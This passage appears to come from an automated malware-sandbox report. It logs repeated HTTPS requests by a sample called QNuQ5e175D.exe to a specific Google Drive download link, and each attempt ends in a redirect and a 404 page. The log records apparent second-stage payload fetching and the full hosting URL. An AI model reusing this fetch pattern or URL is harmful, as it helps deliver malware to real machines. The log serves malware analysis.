                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: script-src 'nonce-73FTCfE98bJZgWptiYil2A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:21 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 33 4b 35 74 46 69 72 72 31 62 62 36 34 58 52 63 50 59 47 45 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="73K5tFirr1bb64XRcPYGEQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      72192.168.2.1150052172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:22 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:22 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:22 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-fSR_FTOwv39KJrsf4lxDBg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      73192.168.2.1150053142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:23 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:24 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgSeJj-UZZmMvhmYQ_5I1p16qTU-ZAq6xD7CsExD97nCd9ZruTxNCcstnCYpCdZM8BS8_NORw5w
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:23 GMT
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-MLY6DPlGitZriuOnXQz50w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 6d 76 51 67 35 62 4f 47 42 58 44 2d 48 72 4c 47 64 68 39 52 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jmvQg5bOGBXD-HrLGdh9Rw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      74192.168.2.1150054172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:24 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:25 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:25 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-jHYZlV4XSti_bz9AfZFChw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      75192.168.2.1150055142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:25 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:26 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQiwmoPlvBzeBVuNawBnksVzfkJ3VpCM-c1RDd_Q6IH86o1z6aEttiVsaniFTQnz_bL9z9NQm4
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:26 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-zaLQfp8jLvZCrcUmhnUmOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 54 65 6a 52 35 36 79 55 4e 73 76 5a 66 4c 67 56 79 62 71 41 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jTejR56yUNsvZfLgVybqAA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      76192.168.2.1150056172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:27 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:27 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:27 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-m6CZtz06ABA-WArOjegk8g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      77192.168.2.1150057142.250.184.2254437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:28 UTC466OUTGET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:28 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC64WyJRqTNhPVdS5N8OifDmaGtIAIYLPKG8bavWbO6JSjCTV0_G1y5h_i_X902_opA9bpdZFiM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:28 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-DiNxNwgG5IstDm4PYtmj3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:28 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 6f 75 4f 6e 43 30 49 36 54 6d 58 5a 37 76 41 31 30 5f 55 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QouOnC0I6TmXZ7vA10_UMg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      78192.168.2.1150058172.217.16.1424437988C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 04:07:29 UTC424OUTGET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:29 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:29 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-Yt_zLS7jLut2-kcvmI4h6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
